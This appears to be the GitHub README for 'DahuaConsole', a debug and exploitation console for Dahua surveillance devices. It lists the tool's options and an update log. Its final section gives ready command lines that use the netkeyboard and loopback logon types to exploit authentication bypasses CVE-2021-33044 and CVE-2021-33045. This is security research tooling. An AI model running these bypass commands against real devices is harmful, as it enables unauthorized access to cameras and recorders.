mcw0/DahuaConsole
GitHub: mcw0/DahuaConsole
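Dedicated debug console tool for Dahua surveillance devices, supporting multi-protocol access and exploitation of authentication bypass vulnerabilities.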
Stars: 303 | Forks: 80
# Dahua Console
- Version: Pre-alpha
- Bugs: Indeed
- TODO: Lots of stuff
[Install requirements]
```
sudo pip3 install -r requirements.txt
```
[Arguments]
```
-h, --help show this help message and exit
--rhost RHOST Remote Target Address (IP/FQDN)
--rport RPORT Remote Target Port
--proto {dhip,dvrip,3des,http,https}
Protocol [Default: dvrip]
--relay RELAY ssh://:@:
--auth AUTH Credentials (username:password) [Default: None]
--ssl Use SSL for remote connection
-d, --debug JSON traffic
-dd, --ddebug hexdump traffic
--dump {config,service,device,discover,log,test}
Dump remote config
--dump_argv DUMP_ARGV
ARGV to --dump
--test test w/o login attempt
--multihost Connect hosts from "dhConsole.json"
--save Save host hash to "dhConsole.json"
--events Subscribe to events [Default: False]
--discover {dhip,dvrip}
Discover local devices
--logon {wsse,loopback,netkeyboard,onvif:plain,onvif:digest,onvif:onvif,plain,ushield,ldap,ad,cms,local,rtsp,basic,old_digest,gui}
Logon types
-f, --force Bypass stops for dangerous commands
--calls Debug internal calls
```
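[Release]
[Update]
2022-07-10
- Added 3des_old login method for VTH1510CH running V2 software from 2016
- Minor differences in the login packet data
- Do not query device parameters on connect - it resets the connection
- Added `--restore config-file.json`
- Loads a json config file or parts of it.
Example: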
`./Console.py --rhost 192.168.1.x --proto 3des --auth admin:admin --logon old_3des --dump config`
[Update]
2021-10-07
For details, see: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt
2021-10-06
[CVE-2021-33044]
Required protocol: DHIP or HTTP/HTTPS (DHIP does not work with TLS/SSL @TCP/443)
```
[proto: dhip, normally using tcp/5000]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 5000
[proto: dhip, usually working with HTTP port as well]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 80
[proto: http/https]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto http --rport 80
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto https --rport 443
```
[CVE-2021-33045]
Required protocol: DHIP (DHIP does not work with TLS/SSL @TCP/443)
```
[proto: dhip, normally using tcp/5000]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 5000
[proto: dhip, usually working with HTTP port as well]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 80
```